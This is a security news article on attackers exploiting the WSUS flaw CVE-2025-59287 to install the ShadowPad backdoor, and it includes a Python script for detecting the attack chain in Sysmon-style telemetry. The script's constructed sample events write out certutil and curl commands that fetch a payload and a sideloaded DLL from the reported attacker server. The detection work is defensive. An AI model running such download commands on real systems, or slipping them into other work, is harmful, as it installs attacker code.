
A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) was exploited by threat actors to distribute malware known as ShadowPad.
“The attackers targeted Windows servers with WSUS enabled and exploited CVE-2025-59287 for initial access,” the AhnLab Security Intelligence Center (ASEC) said in a report released last week. “They then used PowerCat, an open source PowerShell-based Netcat utility, to obtain a system shell (CMD). They then used certutil and curl to download and install ShadowPad.”
ShadowPad, considered a successor to PlugX, is a modular backdoor widely used by Chinese state-sponsored hacking groups. The backdoor first appeared in 2015. In an analysis published in August 2021, SentinelOne called it a “masterpiece of privately sold malware in Chinese espionage operations.”

CVE-2025-59287, which Microsoft patched last month, is a critical deserialization flaw in WSUS that can be exploited for remote code execution with SYSTEM privileges. Exploitation has since picked up, with attackers using it to gain initial access to exposed WSUS instances, perform reconnaissance, and in some cases drop legitimate tooling such as Velociraptor.

CVE-2025-59287 exploited to install ShadowPad
In the attack documented by the South Korean cybersecurity firm, the attacker used the vulnerability to launch the built-in Windows utilities ‘curl.exe’ and ‘certutil.exe’, which connected to an external server (‘149.28.78[.]189:42306’) to download and install ShadowPad.
As with PlugX, ShadowPad is launched via DLL sideloading: a legitimate binary (‘ETDCtrlHelper.exe’) loads a malicious DLL (‘ETDApix.dll’) placed alongside it, and that DLL acts as a memory-resident loader that executes the backdoor.
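The chain above (WSUS worker spawning a shell, certutil/curl fetching a payload, ETDCtrlHelper.exe sideloading ETDApix.dll) is straightforward to hunt for in process-creation and image-load telemetry. The following is an added example written for this article, not code from AhnLab or any product: it triages Sysmon-style events and returns alerts for each stage. The sample events are constructed; the IP and port come from the report, while the URL path, file locations, and the assumption that WSUS code runs under the IIS WsusPool worker (w3wp.exe) or WsusService.exe are mine.

```python
"""Triage constructed Sysmon-style events for the CVE-2025-59287 post-exploitation
chain: WSUS host process spawning a shell, certutil/curl download, and
ETDCtrlHelper.exe sideloading ETDApix.dll from an untrusted directory."""
import re
from dataclasses import dataclass

# Assumption: WSUS request handling runs inside the IIS worker for the WsusPool
# app pool or inside WsusService.exe; neither should normally spawn a shell.
WSUS_HOSTS = {"w3wp.exe", "wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Heuristic: a DLL loaded by the legitimate helper from outside these
# directories is treated as a sideload candidate.
TRUSTED_DIRS = (r"c:\program files", r"c:\windows")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


@dataclass
class Alert:
    rule: str
    detail: str


def check_process(ev: dict) -> list:
    """Process-creation event: Image, ParentImage, CommandLine, ParentCommandLine."""
    alerts = []
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    parent_cmd = ev.get("ParentCommandLine", "").lower()
    cmd = ev.get("CommandLine", "")

    # Stage 1: WSUS host process launching a shell (PowerCat drops into cmd).
    if parent in WSUS_HOSTS and image in SHELLS:
        # w3wp.exe hosts many app pools; only the WsusPool instance is relevant.
        if parent != "w3wp.exe" or "wsuspool" in parent_cmd:
            alerts.append(Alert("wsus_spawns_shell", f"{parent} -> {image}"))

    # Stage 2: LOLBin download of the next stage.
    if image in DOWNLOADERS:
        url = URL_RE.search(cmd)
        lolbin = (image == "certutil.exe" and "-urlcache" in cmd.lower()) or (
            image == "curl.exe" and re.search(r"(^|\s)(-o|--output)(\s|$)", cmd)
        )
        if url and lolbin:
            alerts.append(Alert("lolbin_download", f"{image} fetched {url.group(0)}"))
    return alerts


def check_imageload(ev: dict) -> list:
    """Image-load event: Image (loading process) and ImageLoaded (the DLL)."""
    if basename(ev["Image"]) == "etdctrlhelper.exe" and basename(ev["ImageLoaded"]) == "etdapix.dll":
        if not ev["ImageLoaded"].lower().startswith(TRUSTED_DIRS):
            return [Alert("sideload_etdapix", ev["ImageLoaded"])]
    return []


def triage(events: list) -> list:
    alerts = []
    for ev in events:
        if ev["EventType"] == "ProcessCreate":
            alerts.extend(check_process(ev))
        elif ev["EventType"] == "ImageLoad":
            alerts.extend(check_imageload(ev))
    return alerts


# Constructed sample telemetry (not real log data). The IP:port is the one
# reported; the URL path and file locations are placeholders.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentCommandLine": r'c:\windows\system32\inetsrv\w3wp.exe -ap "WsusPool" -v "v4.0"',
     "CommandLine": "cmd.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentCommandLine": "cmd.exe",
     "CommandLine": r"certutil -urlcache -split -f http://149.28.78.189:42306/payload C:\ProgramData\payload"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentCommandLine": "cmd.exe",
     "CommandLine": r"curl.exe -o C:\ProgramData\ETDApix.dll http://149.28.78.189:42306/ETDApix.dll"},
    {"EventType": "ImageLoad", "Image": r"C:\ProgramData\ETDCtrlHelper.exe",
     "ImageLoaded": r"C:\ProgramData\ETDApix.dll"},
    # Benign noise that must not fire: a user shell and a local certutil use.
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe",
     "CommandLine": "cmd.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "ParentCommandLine": "cmd.exe",
     "CommandLine": "certutil -encode in.bin out.txt"},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.detail}")
```

The first rule is the one worth deploying on its own: a WSUS worker process creating cmd.exe or PowerShell has essentially no legitimate cause, whereas certutil and curl are noisy on general-purpose hosts and the sideload rule only catches this specific binary pair.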

Once installed, the malware launches a core module that loads the plugins embedded in its shellcode into memory, and it includes various anti-detection and persistence techniques.
“After the proof-of-concept (PoC) exploit code for this vulnerability was published, attackers quickly weaponized it and distributed ShadowPad malware via WSUS servers,” AhnLab said. “This vulnerability is significant because it allows remote code execution with system-level privileges, significantly increasing the potential impact.”
